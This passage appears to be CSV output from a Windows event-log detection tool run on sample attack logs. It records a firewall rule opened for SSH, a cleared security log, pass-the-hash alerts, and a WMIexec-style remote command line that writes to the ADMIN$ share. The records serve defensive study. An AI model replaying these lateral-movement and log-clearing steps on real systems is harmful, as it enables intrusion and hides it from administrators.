$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } 
} } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]]
${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { 
[CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:45.556 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:45.556 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:45.557 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:45.683 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:46.214 +09:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:46.469 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-NetFirewallRule): ""New-NetFirewallRule"" ParameterBinding(New-NetFirewallRule): name=""Name""; value=""sshd"" ParameterBinding(New-NetFirewallRule): name=""DisplayName""; value=""OpenSSH Server (sshd)"" ParameterBinding(New-NetFirewallRule): name=""Enabled""; value=""True"" ParameterBinding(New-NetFirewallRule): name=""Direction""; value=""Inbound"" ParameterBinding(New-NetFirewallRule): name=""Protocol""; value=""TCP"" ParameterBinding(New-NetFirewallRule): name=""Action""; value=""Allow"" ParameterBinding(New-NetFirewallRule): name=""LocalPort""; value=""22"" ParameterBinding(New-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(New-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(New-NetFirewallRule): name=""Description""; value="""" ParameterBinding(New-NetFirewallRule): name=""Group""; value="""" ParameterBinding(New-NetFirewallRule): name=""LooseSourceMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""LocalOnlyMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(New-NetFirewallRule): name=""Program""; value="""" ParameterBinding(New-NetFirewallRule): name=""Package""; value="""" ParameterBinding(New-NetFirewallRule): name=""Service""; value="""" ParameterBinding(New-NetFirewallRule): name=""LocalUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteMachine""; value="""" ParameterBinding(New-NetFirewallRule): name=""OverrideBlockRules""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(New-NetFirewallRule): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:46.471 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?sshd"", PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:46.472 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:46.475 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:10:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.258 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
